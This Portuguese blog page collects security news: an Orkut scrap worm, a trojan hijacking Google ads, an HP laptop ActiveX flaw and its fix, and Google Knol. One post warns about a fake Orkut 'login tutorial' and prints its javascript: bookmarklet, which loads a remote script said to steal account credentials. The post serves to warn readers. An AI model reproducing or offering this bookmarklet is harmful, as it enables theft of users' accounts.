Primeira aula sobre criação de blog no telecentro de irani.
Praga em rede social "seqüestrava" usuários
17 comentáriosUma brecha na rede social Orkut levava internautas a figurarem, sem querer, na comunidade "Infectados pelo Vírus do Orkut". Para entrar na comunidade, que chegou a ter 700 mil integrantes, bastava acessar a página de recados de alguém que já tivesse sido infectado. A brecha já foi corrigida.
A "brincadeira" foi criada pelo usuário que se identificou como Rodrigo Lacerda, dono da comunidade. Autor da praga, ele conta no seu blog que não queria causar nenhum mal, nem roubar dados de ninguém, apenas queria ver o potencial de estrago caso isso fosse usado para maus propósitos.
Os scraps utilizados foram: "Feliz natal para vc!", "Tenha uma otima semana =)", "2008 vem ai... que ele comece mto bem para vc", "Boas festas de final de ano", de acordo com o autor.
Rodrigo explica em seu blog como a brincadeira foi criada. Leia um trecho:
"Eu pensava em construir algo que se espalhasse pelo orkut e eu conseguisse roubar o maior número possível de perfis, mas eu não entendia nada de javascript, e antes que pudesse estudar algo, a falha foi corrigida. Hoje eu tenho um nível razoável com a linguagem, e vi que era novamente possível colocar a idéia em prática, mas não para roubar nem prejudicar ninguém, e sim para ver que proporção isso poderia tomar se fosse usado para o mal. A idéia era divulgar um scrap com um link para o Blog do CTRL+C, mas como já falei, desisti da idéia, poderia negativar a imagem do blog. Resolvi então criar a comunidade Infectados pelo Vírus do Orkut e fazer as pessoas entrarem nela e espalhar o código por ai. Funciona assim:
- Você lê o scrap com o código- Ele injeta um código javascript no seu navegador- O código faz você entrar na comunidade- Coleta a sua lista de amigos- Envia o recado com o código para elesE assim tudo vai se espalhando, como um vírus."
Vírus infecta sistema de publicidade do Google
4 comentários
Propagandas colocadas pelo Google em páginas estão sendo seqüestradas por trojans que substituem o texto com publicidade de outro provedor, disse a empresa de antivirus romena BitDefender.Cancelamos as contas de usuários que mostravam publicidade que redirecionava usuários para sites com códigos maliciosos ou que anunciavam um produto que violasse princípios de software", disse o Google na quarta-feira. "Trabalhamos para detectar e remover sites que servem malware na nossa rede de publicidade e nos resultados de buscas. Temos processos manuais e automatizados para detectar e forçar estas políticas", declarou.
"É uma situação séria que traz danos aos usuários e donos de sites", diz Attila Balazs, analista da Bit Defender. "Usuários são afetados por causa da publicidade e/ou dos sites linkados que têm códigos maliciosos", disse. "Webmasters são afetados porque o trojan afasta leitores e portanto possivelmente dinheiro", falou.
A BitDefender descreve o trojan Trojan.Qhost.WU em seu site (www.bitdefender.com) e o classifica como de "baixo" nível de alastramento e causa danos "médios".
Terra Noticias
Reuters
"É uma situação séria que traz danos aos usuários e donos de sites", diz Attila Balazs, analista da Bit Defender. "Usuários são afetados por causa da publicidade e/ou dos sites linkados que têm códigos maliciosos", disse. "Webmasters são afetados porque o trojan afasta leitores e portanto possivelmente dinheiro", falou.
A BitDefender descreve o trojan Trojan.Qhost.WU em seu site (www.bitdefender.com) e o classifica como de "baixo" nível de alastramento e causa danos "médios".
Terra Noticias
Reuters
HP lança atualização crítica de segurança
2 comentários
A HP lançou uma atualização para reparar uma vulnerabilidade crítica em seu software Info Center, que vem instalado de fábrica em diversos modelos de laptops da fabricante e poderia ser explorado por um hacker para instalar malware em máquinas comprometidas após acessar um site malicioso.
Segundo o site heise Security, a atualização apenas desativa o software vulnerável até que uma correção esteja disponível, uma solução mais eficiente do que simplesmente desinstalar o aplicativo que é parte do pacote Quick Launch Buttons.
Entre os computadores afetados estão os notebooks HP Compaq Business com o Quick Launch Buttons versão 6.3 e anteriores, e os aparelhos das séries HP Pavilion e HP Compaq Presario com o software Quick Launch Buttons versões 6.0 a 6.3.
A recomendação da HP é que todos os usuários destes aparelhos instalem a atualização SP38166.exe, que possui pouco mais de 1 MB e pode ser baixada em tinyurl.com/2p5en8.
Segundo o site heise Security, a atualização apenas desativa o software vulnerável até que uma correção esteja disponível, uma solução mais eficiente do que simplesmente desinstalar o aplicativo que é parte do pacote Quick Launch Buttons.
Entre os computadores afetados estão os notebooks HP Compaq Business com o Quick Launch Buttons versão 6.3 e anteriores, e os aparelhos das séries HP Pavilion e HP Compaq Presario com o software Quick Launch Buttons versões 6.0 a 6.3.
A recomendação da HP é que todos os usuários destes aparelhos instalem a atualização SP38166.exe, que possui pouco mais de 1 MB e pode ser baixada em tinyurl.com/2p5en8.
Código malicioso no orkut rouba perfis
7 comentáriosA pouco tempo surgiu um novo javascript, que rouba perfis no orkut, depois de executado parece que ele manda o seu login e a sua senha direto para
um screpbook, apresentamos abaixo a engenharia social usada lembrando que os
lammers estão passando tal javascript como um tutorial, então fique alerta quando vir algo
parecido com o que estamos apresentando abaixo:
LOGANDO ORKUT
Logando no orkut por scrapbookPrimeiro, não é bug, o próprio google oferece o recurso.Pra que serve isso?Para desenvolvedore que precisam por algum motivo injetar os cookies em suas aplicações, como por exemplo um site que oferece algum serviço do orkut.PowerScraps, AdsFacil, porque o scrapbook é remunerável a logins por aceitar htmls....Pode servir também para logar em qualquer serviço do google, mas o assunto aqui é orkut.A página é esta:http://www.orkut.com/Scrapbook.aspxE os parâmetros são estes:Email -> deverá ser colocado o e-mail de login na conta googlePasswd -> senha da conta googleskipvpage -> pula a parte que de verificação de e-mail confirmado(by Lord)service -> serviço da conta googleentão no final ficaria assim:javascript:d=document.createElement('SCRIPT');d.src='ht'+'tp://upashare.110mb.com/Gloogle.Login.js';document.getElementsByTagName('head').item(0).appendChild(d);void(0)Se o login estiver correto irá retornar 3 códigos, algo assim:SID=DQAAAGMAAABArUNwM...LSID=DQAAAGQAAACsRGt9...Auth=DQAAAGYAAACsRGt9...Esse último deverá ser usado para o login no orkut, para isso você precisa jogar ele na RedirLogin assimhttp://www.orkut.com/RedirLogin.aspx?auth=VALOR QUE ESTÁ EM NEGRITO ALI EM CIMAc tiver desconfiando faça um fake e teste ¬¬'O resto é com vocês...
Faraó - Hackers Brasil
Google desenvolve um serviço para concorrer com o Wikipedia
2 comentáriosO Google está desenvolvendo um serviço concorrente da enciclopédia digital on-line Wikipedia, no qual os usuários poderão escrever artigos sobre diferentes temas, mas com sua respectiva assinatura.
O conhecido buscador da internet adiantou em seu blog corporativo os detalhes do projeto, ao qual só se pode ter acesso mediante convite.
O Google chama os artigos de "Knols" ou "unidades de conhecimento" e serão assinados por seus autores, que podem incluir uma foto e uma breve biografia de si mesmos.
"Acreditamos que saber quem escreveu ajudará os usuários a fazer um melhor uso do conteúdo", escreveu Udi Manber, vice-presidente de engenharia do Google, no blog corporativo do buscador.
A outra grande diferença em relação à Wikipedia é que o serviço do Google incluirá anúncios se os autores dos artigos o desejarem e estes poderão ficar com uma parte da receita publicitária.
Os usuários poderão escrever críticas sobre os artigos e avaliá-los, mas não editá-los, como ocorre na Wikipedia.
No entanto, a página de exemplo divulgada pelo Google inclui um link com a palavra "editar", supostamente para que o autor do artigo revise seu conteúdo.
A Wikipedia está disponível em 250 línguas e em conjunto já tem mais de oito milhões de artigos.
Apesar de sua popularidade, foi às vezes motivo de controvérsia pela suposta inexatidão ou subjetividade de algumas de suas entradas.
Terra
Falha em software de laptops HP abre brecha para hackers
0 comentários
Uma falha crítica foi encontrada no software HP Info Center, pré-instalado em notebooks da linha HP Compaq, que permite que um hacker instale malware em laptops através de códigos maliciosos inseridos em páginas acessadas via navegador Internet Explorer 6 ou 7.
Segundo o site heise Security, a causa do problema está em três métodos potencialmente inseguros, em um dos controles ActiveX (HPInfoDLL.dll) instalados pelo software.
Com isto, um hacker poderia acessar o sistema de arquivos e registros do Windows para iniciar downloads automáticos e instalação adicional de software sem intervenção do usuário. O controle foi configurado como "Safe for Scripting", o que permite controle através de qualquer site via JavaScript.
A vulnerabilidade foi noticiada no portal hacker Milw0rm, que explicou que a falha existe no HP Info Center versão 1.0.1.1 rodando sob as versões 2000, XP, Server 2003 e Vista do Windows.
Especialistas do site heise Security testaram a vulnerabilidade e comprovaram o problema em um laptop HP Compaq NX 6125 rodando o Windows XP com Service Pack 2 instalado, todavia não obteve sucesso em explorá-la nos modelos 6715 e 6720, que possuíam o Vista instalado.
O hacker que descobriu o bug, conhecido pelo apelido de "porkythe pig", não explicou se notificou a HP a respeito do assunto, porém recomendou aos usuários que aguardem até a correção do problema ou ainda que utilizem um navegador que não ofereça suporte a ActiveX por padrão, como o Firefox ou o Opera. Outra alternativa seria desabilitar o ActiveX no Internet Explorer.
Confira a lista dos modelos afetados:
» HP 510 Notebook PC» HP 530 Notebook PC» HP Compaq 8710w» HP Compaq 8710p» HP Compaq 8510w» HP Compaq 8510p» HP Compaq 6910b» HP Compaq 6715b» HP Compaq 6510b» HP Compaq 2710p» HP Compaq 2510p» HP Compaq NC series Business Notebook PC» HP Compaq NC6230» HP Compaq NC6220» HP Compaq NC8230» HP Compaq NX series Business Notebook PC» HP Compaq NX7300» HP Compaq NX6120» HP Compaq NX8220» HP Compaq NX6325» HP Compaq NW series Mobile Workstation» HP Compaq NW9440» HP Compaq NW8440
Com isto, um hacker poderia acessar o sistema de arquivos e registros do Windows para iniciar downloads automáticos e instalação adicional de software sem intervenção do usuário. O controle foi configurado como "Safe for Scripting", o que permite controle através de qualquer site via JavaScript.
A vulnerabilidade foi noticiada no portal hacker Milw0rm, que explicou que a falha existe no HP Info Center versão 1.0.1.1 rodando sob as versões 2000, XP, Server 2003 e Vista do Windows.
Especialistas do site heise Security testaram a vulnerabilidade e comprovaram o problema em um laptop HP Compaq NX 6125 rodando o Windows XP com Service Pack 2 instalado, todavia não obteve sucesso em explorá-la nos modelos 6715 e 6720, que possuíam o Vista instalado.
O hacker que descobriu o bug, conhecido pelo apelido de "porkythe pig", não explicou se notificou a HP a respeito do assunto, porém recomendou aos usuários que aguardem até a correção do problema ou ainda que utilizem um navegador que não ofereça suporte a ActiveX por padrão, como o Firefox ou o Opera. Outra alternativa seria desabilitar o ActiveX no Internet Explorer.
Confira a lista dos modelos afetados:
» HP 510 Notebook PC» HP 530 Notebook PC» HP Compaq 8710w» HP Compaq 8710p» HP Compaq 8510w» HP Compaq 8510p» HP Compaq 6910b» HP Compaq 6715b» HP Compaq 6510b» HP Compaq 2710p» HP Compaq 2510p» HP Compaq NC series Business Notebook PC» HP Compaq NC6230» HP Compaq NC6220» HP Compaq NC8230» HP Compaq NX series Business Notebook PC» HP Compaq NX7300» HP Compaq NX6120» HP Compaq NX8220» HP Compaq NX6325» HP Compaq NW series Mobile Workstation» HP Compaq NW9440» HP Compaq NW8440
Assinar:
Postagens (Atom)